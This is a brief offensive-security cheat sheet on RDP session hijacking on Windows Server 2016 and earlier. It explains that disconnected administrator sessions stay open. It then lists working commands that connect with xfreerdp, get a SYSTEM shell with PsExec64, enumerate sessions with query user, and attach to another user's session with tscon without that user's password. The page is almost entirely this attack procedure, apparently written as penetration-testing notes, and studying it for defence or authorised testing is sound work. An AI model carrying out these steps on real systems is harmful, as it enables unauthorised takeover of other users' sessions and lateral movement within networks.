RDP Hijacking

Required Privileges: Administrators

Works only on Windows Server 2016 and Earlier.

When an Administrator uses Remote Desktop to connect to a machine and closes the RDP Client instead of Logging-Off, his Session will remain open on the server indefinitely. If we have SYSTEM Privileges on Windows Server 2016 and Earlier, we can take over any existing RDP Session without requiring a password.

Hijacking the Session

Windows Server 2019 won't allow you to Connect to another User's Session without knowing its Password.

If we have Administrator-Level Access, we can get SYSTEM by any method of our preference.

:: Connect via RDP
xfreerdp /v:TARGET /u:USERNAME /p:PASSWORD

:: Upload - Run [PsExec64]
PsExec64.exe -accepteula

:: Interactive Mode [-i] 
PsExec64.exe -s cmd.exe

:: List Available Sessions
query user
query session

:: Connect to a Session
tscon ID /dest:OUR_SESSIONNAME

Hijacking the Session​

Hijacking the Session